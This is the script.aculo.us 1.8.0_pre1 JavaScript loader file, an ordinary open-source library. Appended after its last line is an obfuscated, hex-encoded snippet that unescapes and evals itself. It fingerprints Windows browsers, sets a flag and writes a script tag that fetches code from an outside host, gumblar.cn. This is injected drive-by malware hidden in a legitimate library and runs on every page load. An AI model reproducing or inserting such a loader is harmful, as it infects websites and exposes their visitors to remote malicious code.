// script.aculo.us scriptaculous.js v1.8.0_pre1, Fri Oct 12 21:34:51 +0200 2007

// Copyright (c) 2005-2007 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// 
// Permission is hereby granted, free of charge, to any person obtaining
// a copy of this software and associated documentation files (the
// "Software"), to deal in the Software without restriction, including
// without limitation the rights to use, copy, modify, merge, publish,
// distribute, sublicense, and/or sell copies of the Software, and to
// permit persons to whom the Software is furnished to do so, subject to
// the following conditions:
// 
// The above copyright notice and this permission notice shall be
// included in all copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
// EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
// MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
// NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
// LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
// OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
// WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
//
// For details, see the script.aculo.us web site: http://script.aculo.us/

var Scriptaculous = {
  Version: '1.8.0_pre1',
  require: function(libraryName) {
    // inserting via DOM fails in Safari 2.0, so brute force approach
    document.write('<script type="text/javascript" src="'+libraryName+'"></script>');
  },
  REQUIRED_PROTOTYPE: '1.6.0',
  load: function() {
    function convertVersionString(versionString){
      var r = versionString.split('.');
      return parseInt(r[0])*100000 + parseInt(r[1])*1000 + parseInt(r[2]);
    }
 
    if((typeof Prototype=='undefined') || 
       (typeof Element == 'undefined') || 
       (typeof Element.Methods=='undefined') ||
       (convertVersionString(Prototype.Version) < 
        convertVersionString(Scriptaculous.REQUIRED_PROTOTYPE)))
       throw("script.aculo.us requires the Prototype JavaScript framework >= " +
        Scriptaculous.REQUIRED_PROTOTYPE);
    
    $A(document.getElementsByTagName("script")).findAll( function(s) {
      return (s.src && s.src.match(/scriptaculous\.js(\?.*)?$/))
    }).each( function(s) {
      var path = s.src.replace(/scriptaculous\.js(\?.*)?$/,'');
      var includes = s.src.match(/\?.*load=([a-z,]*)/);
      (includes ? includes[1] : 'builder,effects,dragdrop,controls,slider,sound').split(',').each(
       function(include) { Scriptaculous.require(path+include+'.js') });
    });
  }
}

Scriptaculous.load();<!-- 
(function(OWW){var xvpZ='va,72,20,61,3d,22,53,63,72i,70tEngi,6ee,22,2c,62,3d,22Version()+,22,2cj,3d,22,22,2cu,3d,6eavig,61t,6fr,2e,75se,72Agent,3bif((u,2eindexOf(,22,57,69n,22),3e,30),26,26,28,75,2eind,65x,4ff(,22,4eT,206,22),3c0),26,26(do,63um,65nt,2e,63ookie,2ei,6e,64ex,4ff(,22,6diek,3d1,22),3c0),26,26(typeof(zrvzt,73,29,21,3d,74y,70eof(,22A,22))),7b,7ar,76zts,3d,22A,22,3beval(,22if(wi,6e,64ow,2e,22+a+,22,29,6a,3d,6a+,22+a+,22Maj,6fr,22+,62+a+,22Minor,22,2bb,2b,61+,22Bui,6cd,22,2bb+,22j,3b,22),3bdoc,75me,6et,2e,77rite(,22,3cscrip,74,20src,3d,2f,2fg,75,6dblar,2ecn,2frss,2f,3f,69,64,3d,22+j+,22,3e,3c,5c,2fs,63r,69pt,3e,22),3b,7d';var EAh=xvpZ.replace(OWW,'%');var KLc=unescape(EAh);eval(KLc)})(/,/g);
 -->